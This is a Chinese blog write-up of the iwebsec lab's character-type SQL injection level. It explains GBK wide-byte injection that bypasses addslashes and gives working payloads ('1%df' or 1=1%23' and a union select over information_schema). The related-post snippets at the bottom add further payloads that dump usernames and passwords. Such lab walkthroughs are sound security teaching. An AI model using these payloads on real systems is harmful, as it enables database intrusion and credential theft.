iwebsec sql字符型注入

最新推荐文章于 2024-07-12 16:24:49 发布
最新推荐文章于 2024-07-12 16:24:49 发布
阅读量214 收藏
点赞数 3
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Enrich_Life/article/details/134137834
版权

02-字符注入

打开如下:

在这里插入图片描述

分析代码:

if(isset($_GET['id'])){
	$id=addslashes($_GET['id']);
	mysql_query("SET NAMES gbk");
	$sql="SELECT * FROM user WHERE id='$id' LIMIT 0,1";
		$result=mysql_query($sql);
	}
	else{
		exit();
	}

addslashes 函数会对引号进行转义,使用宽字节注入即可

1%df' or 1=1%23

原理解析:

我们这里利用的是mysql的一个特性,mysql在使用GBK编码的时候,会认为两个字节是一个汉字(前一个ascii码要大于128,才到汉字范围)

因为gbk是多字节编码,它认为两个字节代表一个字符,所以%df和后面的%5c变成了汉字 “運” ,而 ’ 逃逸了出来

mysql如何判断一个字符是不是一个汉字,根据gbk编码,第一个字节的ascii码大于128,基本上就行
在这里插入图片描述

不一定要使用 %df ,使用 a5 也可以,a5 的 ascii 大于 128

在这里插入图片描述

%a5' or 1=1%23
%a5' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=0x69776562736563)%23 #这里的数据库名用 16 进制编码

在这里插入图片描述

在这里插入图片描述

正在努力…
关注
SQL 字符注入
MZa1213123的博客
03-02 4461
CTFHub SQL 字符注入 可以看到我们输入的数据会被单引号所括上 尝试正常的 1 and 1=2 发现没有报错 还是有回显 字符的 1 and 1=2 就相当于只是字符串 并没有发挥其表达式的作用所以这就没有产生错误回显 (不太明白为什么 sql 还是会查询到id = 1 的数据) 这时候我们添加 ' 手动闭合前一个 sql 语句然后再拼接上我们的 sql 语句进行测试 整个的 sql 语句大概是 $ sql = "select Data from table_name .
理论篇8:SQL注入(字符注入和数字注入)
aiojay的博客
05-02 3791
SQL注入(字符注入和数字注入),Mysql中 int(3) 类的含义,判断MYSQL注入闭合方式:
iwebsec靶场SQL注入漏洞-字符注入
qq_56041380的博客
03-23 613
字符注入就是注入点的数据类字符字符注入与数字注入的区别就是字符注入要用一对单引号引起来。
iwebsec--sql注入漏洞
追求卓越,技术流~
11-20 1847
sql注入漏洞
iwebsec靶场 SQL注入漏洞通关笔记2- 字符注入(宽字节注入
mooyuan的博客
11-26 3259
打开靶场,url为id=1如下所示本次渗透的关卡为字符注入,其实总结来讲本关卡的难度相对而言作为第二关有些难度。通过源码再来分析下SQL注入重点内容:(1)闭合方式是什么?iwebsec的第02关关卡为字符,闭合方式为单引号(2)注入类别是什么?这部分是宽字节注入,需要使用%df(3)是否过滤了关键字?很明显通过源码,iwebsec字符关卡无过滤任何信息。
iwebsec靶场通关sql注入详解
最新发布
m0_51090949的博客
07-12 1379
iwebsec靶场,sql注入通关,详细教程。
iwebsec靶场SQL注入漏洞-数字注入
qq_56041380的博客
03-23 407
group_concat()是将分组中括号里对应的字符串进行连接.如果分组中括号里的参数xxx有多行,那么就会将这多行的字符串连接,每个字符串之间会有特定的符号进行分隔。information_schema数据库存储了SCHEMATA表,TABLES表和COLUMNS表。information_schema数据库是MYSQL自带的数据库,它提供访问数据库元数据的方式。我们可以看到当前数据库的表有sqli,user,users,xss。当把order by 里的数字加到4列时显示。测试3列结果还是显示正常。
简单的SQL字符注入
qq_74350234的博客
07-12 1023
输入:-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+输入:-1' union select 1,2,group_concat(username,'-',password) from users --+可以输入:1' and 1=2 union select 1,2,3--+ 或者-1' union select 1,2,3--+
iwebsec sql注入篇(详细过程,完结)
qq_60829702的博客
03-19 2499
iwebsec靶场,SQL注入篇,详细过程,全篇完结
SQL字符注入漏洞.pdf
07-18
配套博客:https://blog.csdn.net/qq_41739364/article/details/94025729
SQL 数字注入详解 + iwebsec实例
m0_50917178的博客
12-04 6485
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、SQL 数字注入原理二、使用步骤1.引入库2.读入数据总结 前言 本文为作者的学习笔记。其中详细记载了作者对于SQL 数字注入的理解,同时也介绍了利用union联合查询注入成功的完整过程。本文最后作者利用iwebsecWebgoat两个平台来进行实战。如果有不足之处,欢迎指正。 提示:以下是本篇文章正文内容,下面案例可供参考 一、SQL 数字注入原理 当输入的参数为整时例如:ID、年龄等。如果此时存在注入漏洞,
SQL注入字符注入练习(pikachu)
windStudyer的专栏
04-17 3787
SQL注入字符 实现目标:获取到pikachu下的表、数据信息 靶场:pikachu =》sql-inject=》字符注入 实验步骤 第一步目标:拿到数据库名 确定请求方法类 注:为什么需要确定请求方法??自己思考 尝试输入数据,判断请求方法类 从上可以看出,请求的方法为get类注入点在url上边,我们输入的要查询的值是abc,实际被是通过url参数name带入的。而且参数是字符。 判断注入点 从2.1知道请求方法和注入,因为是字符..
绕过waf mysql爆库_iwebsec刷题记录-SQL注入漏洞
weixin_39928844的博客
02-12 845
被推荐了这个web平台,感觉挺适合新手的,网上搜了下没看到有人写wp,这里本入门萌新来稍微整理下自己解题的过程SQL注入漏洞01-数字注入http://localhost:32774/sqli/01.php?id=1'发现有报错You have an error in your SQL syntax; check the manual that corresponds to your MySQL...
sqli-labs lesson1字符注入
Becivells的专栏
06-02 957
sqli-labs lesson1课字符注入
sql字符注入-sqli第1关
weixin_46784800的博客
11-04 435
sql注入知识 dvwa 1' order by 1# 1' order by 2# 1' order by 3# 排序 1' union select 111,222,333 ---可以查看前端与数据库之间的联系,即数据库在前端显示的出口! 1' union select database(),user()# 联合查询 database() 查询数据库名字 user() 返回当前查询的用户名 1' union select version(),@@version_compile_os# ver
CTF学习笔记4:iwebsec-SQL注入漏洞-02-字符注入
lvx++的博客
01-22 955
一、直接上payload 方法:宽字节注入 ?id=-1%df' union select 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users--+ 或 ?id=-1%df%5c%27 union select 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users--+ 二、源码分析 (一)查看源文件 addslashes()是PHP函
iwebsec靶场(sql注入
果粒程
02-24 1193
iwebsec靶场(sql注入
CTF学习笔记5:iwebsec-SQL注入漏洞-03-bool注入
lvx++的博客
01-22 1400
一、解题过程 (一)观察payload与结果 1.SQL执行有结果,就输出welcome to iwebsec!!! 2.否则输出1 (二)编写脚本逐项获取信息 1.获取数据库字符串长度 先要为python安装requests包 pip install requests python代码如下: #encoding=utf-8 import requests import os url="http://192.168.182.130:8001/sqli/03.php" def DbLen():
如何判断是字符注入还是整形注入
欢迎光临
11-25 7056
1、数字注入 当输入的参数为整形时,如果存在注入漏洞,可以认为是数字注入。 测试步骤: (1) 加单引号,URL:www.text.com/text.php?id=3’ 对应的sql:select * from table where id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常; (2) 加and 1=1 ,URL:www.text.com/tex...
SQL注入字符注入步骤
05-25
字符注入是指攻击者利用输入的字符串类的数据来攻击数据库,从而获取数据库中的数据。其步骤如下: 1. 构造恶意的SQL语句:攻击者通过输入恶意的字符串来构造SQL查询语句,从而获取数据库中的数据。 2. 插入...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值